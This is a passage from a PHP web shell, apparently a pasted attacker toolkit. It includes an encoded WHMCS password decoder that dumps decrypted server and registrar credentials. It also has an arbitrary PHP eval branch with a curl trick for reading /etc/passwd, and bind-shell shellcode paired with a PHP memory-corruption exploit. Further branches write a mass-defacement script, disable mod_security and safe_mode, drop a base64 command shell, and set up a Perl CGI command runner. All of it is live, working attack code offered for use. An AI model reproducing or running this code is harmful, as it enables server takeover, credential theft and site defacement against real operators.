hbWUnXTsNCg0KZWNobygiPGNlbnRlcj48dGFibGUgYm9yZGVyPScxJz4iKTsNCiRwYXNzd29yZCA9IGRlY3J5cHQgKCR2WydwYXNzd29yZCddLCAkY2NfZW5jcnlwdGlvbl9oYXNoKTsNCmVjaG8oIjx0cj48dGQ+VHlwZTwvdGQ+PHRkPiR0eXBlPC90ZD48L3RyPiIpOw0KZWNobygiPHRyPjx0ZD5BY3RpdmU8L3RkPjx0ZD4kYWN0aXZlPC90ZD48L3RyPiIpOw0KZWNobygiPHRyPjx0ZD5Ib3N0bmFtZTwvdGQ+PHRkPiRob3N0bmFtZTwvdGQ+PC90cj4iKTsNCmVjaG8oIjx0cj48dGQ+SXA8L3RkPjx0ZD4kaXBhZGRyZXNzPC90ZD48L3RyPiIpOw0KZWNobygiPHRyPjx0ZD5Vc2VybmFtZTwvdGQ+PHRkPiR1c2VybmFtZTwvdGQ+PC90cj4iKTsNCmVjaG8oIjx0cj48dGQ+UGFzc3dvcmQ8L3RkPjx0ZD4kcGFzc3dvcmQ8L3RkPjwvdHI+Iik7DQoNCg0KZWNobyAiPC90YWJsZT48YnI+PGJyPjwvY2VudGVyPiI7DQoNCn0NCg0KICAgICRsaW5rPW15c3FsX2Nvbm5lY3QoJGRiX2hvc3QsJGRiX3VzZXJuYW1lLCRkYl9wYXNzd29yZCkgOw0KCSAgICBteXNxbF9zZWxlY3RfZGIoJGRiX25hbWUsJGxpbmspIDsNCg0KJHF1ZXJ5ID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gdGJscmVnaXN0cmFycyIpOw0KZWNobygiPGNlbnRlcj5Eb21haW4gUmVzZWxsZXIgPGJyPjx0YWJsZSBib3JkZXI9JzEnPiIpOw0KZWNobygiPHRyPjx0ZD5SZWdpc3RyYXI8L3RkPjx0ZD5TZXR0aW5nPC90ZD48dGQ+VmFsdWU8L3RkPjwvdHI+Iik7DQp3aGlsZSgkdiA9IG15c3FsX2ZldGNoX2FycmF5KCRxdWVyeSkpIHsNCg0KJHJlZ2lzdHJhciAJPSAkdlsncmVnaXN0cmFyJ107DQokc2V0dGluZyA9ICR2WydzZXR0aW5nJ107DQokdmFsdWUgPSBkZWNyeXB0ICgkdlsndmFsdWUnXSwgJGNjX2VuY3J5cHRpb25faGFzaCk7DQppZiAoJHZhbHVlPT0iIikgew0KJHZhbHVlPTA7DQp9DQokcGFzc3dvcmQgPSBkZWNyeXB0ICgkdlsncGFzc3dvcmQnXSwgJGNjX2VuY3J5cHRpb25faGFzaCk7DQplY2hvKCI8dHI+PHRkPiRyZWdpc3RyYXI8L3RkPjx0ZD4kc2V0dGluZzwvdGQ+PHRkPiR2YWx1ZTwvdGQ+PC90cj4iKTsNCg0KDQoNCg0KDQp9DQplY2hvICI8L3RhYmxlPjxicj48YnI+PC9jZW50ZXI+IjsNCn0NCg0KDQoNCiBpZigkX1BPU1RbJ2Zvcm1fYWN0aW9uJ10gPT0gMiApDQogew0KIC8vaW5jbHVkZSgkZmlsZSk7DQoNCiAkZGJfaG9zdD0oJF9QT1NUWydkYl9ob3N0J10pOw0KICRkYl91c2VybmFtZT0oJF9QT1NUWydkYl91c2VybmFtZSddKTsNCiAkZGJfcGFzc3dvcmQ9KCRfUE9TVFsnZGJfcGFzc3dvcmQnXSk7DQogJGRiX25hbWU9KCRfUE9TVFsnZGJfbmFtZSddKTsNCiAkY2NfZW5jcnlwdGlvbl9oYXNoPSgkX1BPU1RbJ2NjX2VuY3J5cHRpb25faGFzaCddKTsNCg0KDQoNCg0KICAgICRsaW5rPW15c3FsX2Nvbm5lY3QoJGRiX2hvc3QsJGRiX3VzZXJuYW1lLCRkYl9wYXNzd29yZCkgOw0KCSAgICBteXNxbF9zZWxlY3RfZGIoJGRiX25hbWUsJGxpbmspIDsNCg0KJHF1ZXJ5ID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gdGJsc2VydmVycyIpOw0KDQp3aGlsZSgkdiA9IG15c3FsX2ZldGNoX2FycmF5KCRxdWVyeSkpIHsNCg0KJGlwYWRkcmVzcyA9ICR2WydpcGFkZHJlc3MnXTsNCiR1c2VybmFtZSA9ICR2Wyd1c2VybmFtZSddOw0KJHR5cGUgPSAkdlsndHlwZSddOw0KJGFjdGl2ZSA9ICR2WydhY3RpdmUnXTsNCiRob3N0bmFtZSA9ICR2Wydob3N0bmFtZSddOw0KDQplY2hvKCI8Y2VudGVyPjx0YWJsZSBib3JkZXI9JzEnPiIpOw0KJHBhc3N3b3JkID0gZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sICRjY19lbmNyeXB0aW9uX2hhc2gpOw0KZWNobygiPHRyPjx0ZD5UeXBlPC90ZD48dGQ+JHR5cGU8L3RkPjwvdHI+Iik7DQplY2hvKCI8dHI+PHRkPkFjdGl2ZTwvdGQ+PHRkPiRhY3RpdmU8L3RkPjwvdHI+Iik7DQplY2hvKCI8dHI+PHRkPkhvc3RuYW1lPC90ZD48dGQ+JGhvc3RuYW1lPC90ZD48L3RyPiIpOw0KZWNobygiPHRyPjx0ZD5JcDwvdGQ+PHRkPiRpcGFkZHJlc3M8L3RkPjwvdHI+Iik7DQplY2hvKCI8dHI+PHRkPlVzZXJuYW1lPC90ZD48dGQ+JHVzZXJuYW1lPC90ZD48L3RyPiIpOw0KZWNobygiPHRyPjx0ZD5QYXNzd29yZDwvdGQ+PHRkPiRwYXNzd29yZDwvdGQ+PC90cj4iKTsNCg0KDQplY2hvICI8L3RhYmxlPjxicj48YnI+PC9jZW50ZXI+IjsNCg0KfQ0KDQoNCiAgICAkbGluaz1teXNxbF9jb25uZWN0KCRkYl9ob3N0LCRkYl91c2VybmFtZSwkZGJfcGFzc3dvcmQpIDsNCgkgICAgbXlzcWxfc2VsZWN0X2RiKCRkYl9uYW1lLCRsaW5rKSA7DQoNCiRxdWVyeSA9IG15c3FsX3F1ZXJ5KCJTRUxFQ1QgKiBGUk9NIHRibHJlZ2lzdHJhcnMiKTsNCmVjaG8oIjxjZW50ZXI+RG9tYWluIFJlc2VsbGVyIDxicj48dGFibGUgYm9yZGVyPScxJz4iKTsNCmVjaG8oIjx0cj48dGQ+UmVnaXN0cmFyPC90ZD48dGQ+U2V0dGluZzwvdGQ+PHRkPlZhbHVlPC90ZD48L3RyPiIpOw0Kd2hpbGUoJHYgPSBteXNxbF9mZXRjaF9hcnJheSgkcXVlcnkpKSB7DQoNCiRyZWdpc3RyYXIgCT0gJHZbJ3JlZ2lzdHJhciddOw0KJHNldHRpbmcgPSAkdlsnc2V0dGluZyddOw0KJHZhbHVlID0gZGVjcnlwdCAoJHZbJ3ZhbHVlJ10sICRjY19lbmNyeXB0aW9uX2hhc2gpOw0KaWYgKCR2YWx1ZT09IiIpIHsNCiR2YWx1ZT0wOw0KfQ0KJHBhc3N3b3JkID0gZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sICRjY19lbmNyeXB0aW9uX2hhc2gpOw0KZWNobygiPHRyPjx0ZD4kcmVnaXN0cmFyPC90ZD48dGQ+JHNldHRpbmc8L3RkPjx0ZD4kdmFsdWU8L3RkPjwvdHI+Iik7DQoNCg0KDQoNCg0KfQ0KZWNobyAiPC90YWJsZT48YnI+PGJyPjwvY2VudGVyPiI7DQp9DQoNCg0KDQoNCj8+PGJvZHkgYmdjb2xvcj0iIzAwMDAwMCI+DQogPHN0eWxlPg0KDQpCT0RZIHsgU0NST0xMQkFSLUJBU0UtQ09MT1I6ICMxOTE5MTk7IFNDUk9MTEJBUi1BUlJPVy1DT0xPUjogb2xpdmU7ICAgY29sb3I6IHdoaXRlO30NCnRleHRhcmVhe2JhY2tncm91bmQtY29sb3I6IzE5MTkxOTtjb2xvcjpyZWQ7Zm9udC13ZWlnaHQ6Ym9sZDtmb250LXNpemU6IDEycHg7Zm9udC1mYW1pbHk6IFRhaG9tYTsgYm9yZGVyOiAxcHggc29saWQgIzY2NjY2Njt9DQppbnB1dHtGT05ULVdFSUdIVDpub3JtYWw7YmFja2dyb3VuZC1jb2xvcjogIzE5MTkxOTtmb250LXNpemU6IDEzcHg7Zm9udC13ZWlnaHQ6Ym9sZDtjb2xvcjogcmVkOyBmb250LWZhbWlseTogVGFob21hOyBib3JkZXI6IDFweCBzb2xpZCAjNjY2NjY2O2hlaWdodDoxN30NCjwvc3R5bGU+DQo8Y2VudGVyPg0KPGZvbnQgY29sb3I9IiNGRkZGNkZGIiBzaXplPScrMyc+WyB+fiBXSE1DUyBTZXJ2ZXIgUGFzc3dvcmQgZGVjb2RlciB+fiBdPC9mb250Pjxicj48YnI+DQo8Zm9udCBjb2xvcj0iIzAwNjZGRiIgc2l6ZT0nKzInPlN5bWxpbmsgdG8gY29uZmlndXJhdGlvbi5waHAgb2YgV0hNQ1M8L2ZvbnQ+PGJyPg0KPC9jZW50ZXI+DQo8Rk9STSBhY3Rpb249IiIgIG1ldGhvZD0icG9zdCI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJmb3JtX2FjdGlvbiIgdmFsdWU9IjEiPg0KPGJyPg0KIDxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIzMCIgbmFtZT0iZmlsZSIgdmFsdWU9IiI+DQo8YnI+DQo8SU5QVVQgY2xhc3M9c3VibWl0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlN1Ym1pdCIgbmFtZT0iU3VibWl0Ij4NCjwvRk9STT4NCjxocj4NCg0KPGJyPg0KPGNlbnRlcj4NCjxmb250IGNvbG9yPSIjMDA2NkZGIiBzaXplPScrMic+REIgY29uZmlndXJhdGlvbiBvZiBXSE1DUzwvZm9udD48YnI+DQo8L2NlbnRlcj4NCjxGT1JNIGFjdGlvbj0iIiAgbWV0aG9kPSJwb3N0Ij4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImZvcm1fYWN0aW9uIiB2YWx1ZT0iMiI+DQo8YnI+DQo8dGFibGUgYm9yZGVyPTE+DQoNCjx0cj48dGQ+ZGJfaG9zdCA8L3RkPjx0ZD48aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iMzAiIG5hbWU9ImRiX2hvc3QiIHZhbHVlPSJsb2NhbGhvc3QiPjwvdGQ+PC90cj4NCjx0cj48dGQ+ZGJfdXNlcm5hbWUgPC90ZD48dGQ+PGlucHV0IHR5cGU9InRleHQiIHNpemU9IjMwIiBuYW1lPSJkYl91c2VybmFtZSIgdmFsdWU9IiI+PC90ZD48L3RyPg0KPHRyPjx0ZD5kYl9wYXNzd29yZDwvdGQ+PHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIzMCIgbmFtZT0iZGJfcGFzc3dvcmQiIHZhbHVlPSIiPjwvdGQ+PC90cj4NCjx0cj48dGQ+ZGJfbmFtZTwvdGQ+PHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIzMCIgbmFtZT0iZGJfbmFtZSIgdmFsdWU9IiI+PHRkPjwvdHI+DQo8dHI+PHRkPmNjX2VuY3J5cHRpb25faGFzaDwvdGQ+PHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIzMCIgbmFtZT0iY2NfZW5jcnlwdGlvbl9oYXNoIiB2YWx1ZT0iIj48L3RkPjwvdHI+DQoNCjwvdGFibGU+DQo8YnI+DQo8SU5QVVQgY2xhc3M9c3VibWl0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlN1Ym1pdCIgbmFtZT0iU3VibWl0Ij4NCjwvRk9STT4NCjxocj4NCjxjZW50ZXI+DQo8Zm9udCBjb2xvcj0iIzAwNjZGRiIgc2l6ZT0nKzInPlBhc3N3b3JkIGRlY29kZXI8L2ZvbnQ+PGJyPg0KPD8NCiBpZigkX1BPU1RbJ2Zvcm1fYWN0aW9uJ10gPT0gMyApDQogew0KDQoNCg0KICRwYXNzd29yZD0oJF9QT1NUWydwYXNzd29yZCddKTsNCg0KICRjY19lbmNyeXB0aW9uX2hhc2g9KCRfUE9TVFsnY2NfZW5jcnlwdGlvbl9oYXNoJ10pOw0KDQoNCiRwYXNzd29yZCA9IGRlY3J5cHQgKCRwYXNzd29yZCwgJGNjX2VuY3J5cHRpb25faGFzaCk7DQoNCmVjaG8oIlBhc3N3b3JkIGlzICIuJHBhc3N3b3JkKTsNCg0KfQ0KPz4NCjwvY2VudGVyPg0KPEZPUk0gYWN0aW9uPSIiICBtZXRob2Q9InBvc3QiPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZm9ybV9hY3Rpb24iIHZhbHVlPSIzIj4NCjxicj4NCjx0YWJsZSBib3JkZXI9MT4NCg0KPHRyPjx0ZD5QYXNzd29yZDwvdGQ+PHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIzMCIgbmFtZT0icGFzc3dvcmQiIHZhbHVlPSIiPjwvdGQ+PC90cj4NCjx0cj48dGQ+Y2NfZW5jcnlwdGlvbl9oYXNoPC90ZD48dGQ+PGlucHV0IHR5cGU9InRleHQiIHNpemU9IjMwIiBuYW1lPSJjY19lbmNyeXB0aW9uX2hhc2giIHZhbHVlPSIiPjwvdGQ+PC90cj4NCg0KPC90YWJsZT4NCjxicj4NCjxJTlBVVCBjbGFzcz1zdWJtaXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iU3VibWl0IiBuYW1lPSJTdWJtaXQiPg0KPC9GT1JNPg0KPGhyPg0KDQoNCiAgPGNlbnRlcj4gPGZvbnQgY29sb3I9IiNGRkZGNkZGIiBzaXplPScrMSc+ICAgQ29kZWQgQnkgUkFCM09VTiB2LmItNEBob3RtYWlsLmNvbSAgICA8L2ZvbnQ+PGJyPjxicj4gPGNlbnRlcj4=
  6600.  
  6601. "));
  6602.  
  6603. break;
  6604.  
  6605. case "PHP_24":
  6606.  
  6607. $code=stripslashes($_POST['code']);
  6608.  
  6609. echo '<center><br><h3> PHP Code Evaluating </h3></center>
  6610.  
  6611. <center>
  6612.  
  6613. <form method="POST" action="">
  6614.  
  6615. <input type="hidden" name="id" value="eval">
  6616.  
  6617. <textarea name ="code" rows="10" cols="85" class="textarea">',$code,'mkDIR("file:");
  6618.  
  6619. chdir("file:");
  6620.  
  6621. mkDIR("etc");
  6622.  
  6623. chdir("etc");
  6624.  
  6625. mkDIR("passwd");
  6626.  
  6627. chdir("..");
  6628.  
  6629. chdir("..");
  6630.  
  6631.  
  6632.  
  6633. $ch = curl_init();
  6634.  
  6635.  
  6636.  
  6637. curl_setopt($ch, CURLOPT_URL, "file:file:///etc/passwd");
  6638.  
  6639. curl_setopt($ch, CURLOPT_HEADER, 0);
  6640.  
  6641.  
  6642.  
  6643. curl_exec($ch);
  6644.  
  6645.  
  6646.  
  6647. curl_close($ch);</textarea><br><br>
  6648.  
  6649. <input type="submit" value=" Evaluate PHP Code" class="button"><hr>
  6650.  
  6651. </form>
  6652.  
  6653. <textarea rows="10" cols="85" class="textarea">';
  6654.  
  6655. eval($code);
  6656.  
  6657. echo '</textarea><br><br>';
  6658.  
  6659. break;
  6660.  
  6661. case "PHP_25":
  6662.  
  6663. $shellcode = "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89".
  6664.  
  6665.  
  6666.  
  6667. "\xe1\xcd\x80\x52\x43\x68\xff\x02".
  6668.  
  6669.  
  6670.  
  6671. "\x22\xb8". //port (8888)
  6672.  
  6673.  
  6674.  
  6675. "\x89\xe1".
  6676.  
  6677.  
  6678.  
  6679. "\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80".
  6680.  
  6681.  
  6682.  
  6683. "\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0".
  6684.  
  6685.  
  6686.  
  6687. "\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80".
  6688.  
  6689.  
  6690.  
  6691. "\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f".
  6692.  
  6693.  
  6694.  
  6695. "\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
  6696.  
  6697.  
  6698.  
  6699.  
  6700.  
  6701.  
  6702.  
  6703. $________________________str = str_repeat("A", 39);
  6704.  
  6705.  
  6706.  
  6707. $________________________yyy = &$________________________str;
  6708.  
  6709.  
  6710.  
  6711. $________________________xxx = &$________________________str;
  6712.  
  6713.  
  6714.  
  6715. for ($i = 0; $i < 65534; $i++) $arr[] = &$________________________str;
  6716.  
  6717.  
  6718.  
  6719. $________________________aaa = " XXXXX ";
  6720.  
  6721.  
  6722.  
  6723. $________________________aab = " XXXx.xXXX ";
  6724.  
  6725.  
  6726.  
  6727. $________________________aac = " XXXx.xXXX ";
  6728.  
  6729.  
  6730.  
  6731. $________________________aad = " XXXXX ";
  6732.  
  6733.  
  6734.  
  6735. unset($________________________xxx);
  6736.  
  6737.  
  6738.  
  6739. unset($________________________aaa);
  6740.  
  6741.  
  6742.  
  6743. unset($________________________aab);
  6744.  
  6745.  
  6746.  
  6747. unset($________________________aac);
  6748.  
  6749.  
  6750.  
  6751. unset($________________________aad);
  6752.  
  6753.  
  6754.  
  6755. $arr = array($shellcode => 1);
  6756.  
  6757.  
  6758.  
  6759.  
  6760.  
  6761.  
  6762.  
  6763. $addr = unpack("L", substr($________________________str, 6*4, 4));
  6764.  
  6765.  
  6766.  
  6767. $addr = $addr[1] + 32;
  6768.  
  6769.  
  6770.  
  6771. $addr = pack("L", $addr);
  6772.  
  6773.  
  6774.  
  6775.  
  6776.  
  6777.  
  6778.  
  6779. for ($i=0; $i<strlen($addr); $i++) {
  6780.  
  6781.  
  6782.  
  6783. $________________________str[8*4+$i] = $addr[$i];
  6784.  
  6785.  
  6786.  
  6787. $________________________yyy[8*4+$i] = $addr[$i];
  6788.  
  6789.  
  6790.  
  6791. }
  6792.  
  6793.  
  6794.  
  6795. unset($arr);
  6796.  
  6797. break;
  6798.  
  6799. case "PHP_26":
  6800.  
  6801.  
  6802.  
  6803. $crackftp = 'PGh0bWw+DQo8aGVhZD4NCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQo8IS0tDQpib2R5IHsgY29sb3I6IzAwMDsNCn0NCmJvZHkgKnsgbWFyZ2luOiAwOyBwYWRkaW5nOiAwOyBmb250LWZhbWlseTpDZW50dXJ5IEdvdGhpYywgQ29taWMgU2FucyBNUzt9DQphCXsgdGV4dC1kZWNvcmF0aW9uOm5vbmU7IGNvbG9yOiMzMzY2OTk7IH0NCmE6aG92ZXIgeyB0ZXh0LWRlY29yYXRpb246IHVuZGVybGluZTsgfQ0KYm9keSwgdGR7ICBtYXJnaW46IDA7ICBwYWRkaW5nOiAwOyAgZm9udC1zaXplOiBub3JtYWw7fQ0KYnsgZm9udC13ZWlnaHQ6Ym9sZDsgfQ0KaW5wdXQsdGV4dGFyZWEsc2VsZWN0IHsNCgljb2xvcjojMzM2Njk5Ow0KCWJhY2tncm91bmQtY29sb3I6I2ZmZjsNCglmb250LWZhbWlseTpDZW50dXJ5IEdvdGhpYywgQXJpYWw7DQogICAgZm9udC13ZWlnaHQ6IGJvbGQ7DQoJYm9yZGVyOjFweCBzb2xpZCAjMzMzOw0KCW1hcmdpbjoycHg7DQoJYm9yZGVyLXJhZGl1czogNnB4Ow0KCS13ZWJraXQtYm9yZGVyLXJhZGl1czogNnB4Ow0KCS1tb3otYm9yZGVyLXJhZGl1czogNnB4Ow0KfQ0KaW5wdXQuc3VibWl0LGlucHV0W3R5cGU9c3VibWl0XQ0Kew0KbWFyZ2luOjJweDsNCmJhY2tncm91bmQtY29sb3I6IzZkODRiNDsNCmJvcmRlcjoxcHggc29saWQgIzAwMDAwMDsNCmZvbnQtd2VpZ2h0OmJvbGQ7DQpjb2xvcjojZmZmZmZmDQp9DQouSGVhZGVyIHsgDQpiYWNrZ3JvdW5kOiAjMzM2Njk5OyANCnRleHQtYWxpZ246Y2VudGVyOyANCnBhZGRpbmc6MnB4OyBjb2xvcjogDQojZmZmOyBmb250LXdlaWdodDpib2xkOw0KfQ0KLmZvb3RlcntiYWNrZ3JvdW5kOiNEREU3RjE7IGZvbnQtd2VpZ2h0OmJvbGQ7IGJvcmRlci10b3A6MXB4IHNvbGlkICNhYmM7IHBhZGRpbmc6NXB4OyBmb250LXdlaWdodDpib2xkOyB0ZXh0LWFsaWduOmNlbnRlcjsgIH0NCi0tPg0KPC9zdHlsZT4NCjwvaGVhZD4NCjxib2R5Pg0KPGJyLz4NCjxiPg0KPGZvcm0gRU5DVFlQRT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgYWN0aW9uPSI8PyRfU0VSVkVSWydQSFBfU0VMRiddPz4iIG1ldGhvZD1wb3N0Pg0KRm9sZGVyIDo8YnIvPg0KPGlucHV0IHR5cD10ZXh0IG5hbWU9cGF0aCBzaXplPTYwIHZhbHVlPSI8Pz1nZXRjd2QoKTs/PiI+PGJyPg0KRmlsZSBOYW1lIDo8YnIvPg0KPGlucHV0IHR5cD10ZXh0IG5hbWU9ZmlsZSBzaXplPTYwIHZhbHVlPSJpbmRleC5odG1sIj48YnI+DQpEZWZhY2UgUGFnZSBVUkwgOiA8c21hbGw+KGV4OiBodHRwOi8vc2l0ZS5jb20vYWxtYXhoYWNrZXJpbmRleC50eHQpPC9zbWFsbD48YnIvPg0KPGlucHV0IHR5cD10ZXh0IG5hbWU9dXJsIHNpemU9NjAgdmFsdWU9Imh0dHA6Ly9zaXRlLmNvbS9hbG1heGhhY2tlcmluZGV4LnR4dCI+PGJyPg0KPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPURlZmFjZT4NCjwvZm9ybT4NCjw/cGhwDQokbWFpbnBhdGg9JF9QT1NUW3BhdGhdOw0KJGZpbGU9JF9QT1NUW2ZpbGVdOw0KJGluZGV4dXJsPSRfUE9TVFt1cmxdOw0KZWNobyAiPGJyPiI7DQokZGlyPW9wZW5kaXIoIiRtYWlucGF0aCIpOw0Kd2hpbGUoJHJvdz1yZWFkZGlyKCRkaXIpKQ0Kew0KJHN0YXJ0PUBmb3BlbigiJHJvdy8kZmlsZSIsIncrIik7DQokY29kZT1AZmlsZV9nZXRfY29udGVudHMoJGluZGV4dXJsKTsNCiRmaW5pc2g9QGZ3cml0ZSgkc3RhcnQsJGNvZGUpOw0KaWYgKCRmaW5pc2gpDQp7DQplY2hvICImIzE4NzsgJHJvdy8kZmlsZSAgJiMxODc7IERvbmU8YnI+PGJyPiI7DQp9DQp9DQo/Pg0KPC9ib2R5Pg0KPC9odG1sPg==';
  6804.  
  6805.  
  6806.  
  6807. $file = fopen("masss.php" ,"w+");
  6808.  
  6809. $write = fwrite ($file ,base64_decode($crackftp));
  6810.  
  6811. fclose($file);
  6812.  
  6813.  
  6814.  
  6815. echo "<iframe src=ftpcrack.php width=100% height=100% frameborder=0></iframe> ";
  6816.  
  6817. break;
  6818.  
  6819. case "PHP_27":
  6820.  
  6821. mkdir('safeof', 0755);
  6822.  
  6823. chdir('safeof');
  6824.  
  6825. $kokdosya = ".htaccess";
  6826.  
  6827.  
  6828.  
  6829. $dosya_adi = "$kokdosya";
  6830.  
  6831. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a??lamad?!");
  6832.  
  6833. $metin = "<IfModule mod_security.c>
  6834.  
  6835. SecFilterEngine Off
  6836.  
  6837. SecFilterScanPOST Off
  6838.  
  6839. </IfModule>";
  6840.  
  6841. fwrite ( $dosya , $metin ) ;
  6842.  
  6843. fclose ($dosya);
  6844.  
  6845.  
  6846.  
  6847. $kokdosya = "php.ini";
  6848.  
  6849.  
  6850.  
  6851. $dosya_adi = "$kokdosya";
  6852.  
  6853. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a??lamad?!");
  6854.  
  6855. $metin = "safe_mode = OFF
  6856.  
  6857. disable_functions = NONE";
  6858.  
  6859. fwrite ( $dosya , $metin ) ;
  6860.  
  6861. fclose ($dosya);
  6862.  
  6863. $mini = 'PEJPRFkgT25LZXlQcmVzcz0iR2V0S2V5Q29kZSgpOyIgdGV4dD0jZmZmZmZmIGJvdHRvbU1hcmdp
  6864.  
  6865. bj0wIGJnQ29sb3I9IzAwMDAwMCBsZWZ0TWFyZ2luPTAgdG9wTWFyZ2luPTAgcmlnaHRNYXJnaW49
  6866.  
  6867. MCBtYXJnaW5oZWlnaHQ9MCBtYXJnaW53aWR0aD0wPjxjZW50ZXI+PFRBQkxFIHN0eWxlPSJCT1JE
  6868.  
  6869. RVItQ09MTEFQU0U6IGNvbGxhcHNlIiBoZWlnaHQ9MCBjZWxsU3BhY2luZz0wIGJvcmRlckNvbG9y
  6870.  
  6871. RGFyaz0jNjY2NjY2IGNlbGxQYWRkaW5nPTIgd2lkdGg9IjEwMCUiIGJnY29sb3I9IzAwMDAwMCBi
  6872.  
  6873. b3JkZXJDb2xvckxpZ2h0PSNjMGMwYzAgYm9yZGVyPTEgYm9yZGVyY29sb3I9IiNDMEMwQzAiPjx0
  6874.  
  6875. cj48dGggd2lkdGg9IjEwMSUiIGhlaWdodD0iMiIgbm93cmFwIGJvcmRlcmNvbG9yPSIjQzBDMEMw
  6876.  
  6877. IiB2YWxpZ249InRvcCIgY29sc3Bhbj0iMiI+PGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMzNGRiI+
  6878.  
  6879. DQo8P3BocA0KZWNobyAiPGI+PGZvbnQgY29sb3I9Ymx1ZT5Db21tYW5kIFNoZWxsPC9mb250Pjwv
  6880.  
  6881. Yj48YnI+IjsNCnByaW50X3IoJw0KPHByZT4NCjxmb3JtIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIi
  6882.  
  6883. Pg0KPGI+PGZvbnQgY29sb3I9Ymx1ZT5Lb211dCA6PC9mb250PjwvYj48aW5wdXQgbmFtZT0iYmFi
  6884.  
  6885. YSIgdHlwZT0idGV4dCI+PGlucHV0IHZhbHVlPSJCYXMga29tdXR1IGRheWkiIHR5cGU9InN1Ym1p
  6886.  
  6887. dCI+DQo8L2Zvcm0+DQo8L3ByZT4NCicpOw0KaW5pX3Jlc3RvcmUoInNhZmVfbW9kZSIpOw0KaW5p
  6888.  
  6889. X3Jlc3RvcmUoIm9wZW5fYmFzZWRpciIpOw0KJGxpejA9c2hlbGxfZXhlYygkX1BPU1RbYmFiYV0p
  6890.  
  6891. OyANCiRsaXowemltPXNoZWxsX2V4ZWMoJF9QT1NUW2xpejBdKTsgDQokdWlkPXNoZWxsX2V4ZWMo
  6892.  
  6893. J2lkJyk7DQokc2VydmVyPXNoZWxsX2V4ZWMoJ3VuYW1lIC1hJyk7DQplY2hvICI8cHJlPjxoND4i
  6894.  
  6895. Ow0KZWNobyAiPGI+PGZvbnQgY29sb3I9cmVkPmlkIDo8L2ZvbnQ+PC9iPjokdWlkPGJyPiI7DQpl
  6896.  
  6897. Y2hvICI8Yj48Zm9udCBjb2xvcj1yZWQ+U2VydmVyPC9mb250PjwvYj46JHNlcnZlcjxicj4iOw0K
  6898.  
  6899. ZWNobyAiPGI+PGZvbnQgY29sb3I9cmVkPktvbXV0IFNvbnXnbGFyMTo8L2ZvbnQ+PC9iPjxicj4i
  6900.  
  6901. OyANCmVjaG8gJGxpejA7DQplY2hvICRsaXowemltOw0KZWNobyAiPC9oND48L3ByZT4iOw0KPz4=
  6902.  
  6903. ';
  6904.  
  6905.  
  6906.  
  6907. $file = fopen("safe.php" ,"w+");
  6908.  
  6909. $write = fwrite ($file ,base64_decode($mini));
  6910.  
  6911. fclose($file);
  6912.  
  6913. echo "<iframe src=safeof/safe.php width=100% height=100% frameborder=0></iframe> ";
  6914.  
  6915. break;
  6916.  
  6917. case "PHP_28":
  6918.  
  6919. mkdir('cgirun', 0755);
  6920.  
  6921. chdir('cgirun');
  6922.  
  6923. $kokdosya = ".htaccess";
  6924.  
  6925. $dosya_adi = "$kokdosya";
  6926.  
  6927. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
  6928.  
  6929. $metin = "AddHandler cgi-script .pr";
  6930.  
  6931. fwrite ( $dosya , $metin ) ;
  6932.  
  6933. fclose ($dosya);
  6934.  
  6935. $cgico = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbg0KIw0KIyBQZXJsS2l0LTAuMSAt
  6936.  
  6937. IFtEb2FyIHVzZXJpaSBpbnJlZ2lzdHJhdGkgcG90IHZlZGVhIGxpbmt1cmlsZS4gXQ0KIw0KIyBj
  6938.  
  6939. bWQucGw6IFJ1biBjb21tYW5kcyBvbiBhIHdlYnNlcnZlcg0KDQp1c2Ugc3RyaWN0Ow0KDQpteSAo
  6940.  
  6941. JGNtZCwgJUZPUk0pOw0KDQokfD0xOw0KDQpwcmludCAiQ29udGVudC1UeXBlOiB0ZXh0L2h0bWxc
  6942.  
  6943. clxuIjsNCnByaW50ICJcclxuIjsNCg0KIyBHZXQgcGFyYW1ldGVycw0KDQolRk9STSA9IHBhcnNl
  6944.  
  6945. X3BhcmFtZXRlcnMoJEVOVnsnUVVFUllfU1RSSU5HJ30pOw0KDQppZihkZWZpbmVkICRGT1JNeydj
  6946.  
  6947. bWQnfSkgew0KICAkY21kID0gJEZPUk17J2NtZCd9Ow0KfQ0KDQpwcmludCAnPEhUTUw+DQo8Ym9k
  6948.  
  6949. eT4NCjxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9IkdFVCI+DQo8aW5wdXQgdHlwZT0idGV4dCIgbmFt
  6950.  
  6951. ZT0iY21kIiBzaXplPTQ1IHZhbHVlPSInIC4gJGNtZCAuICciPg0KPGlucHV0IHR5cGU9InN1Ym1p
  6952.  
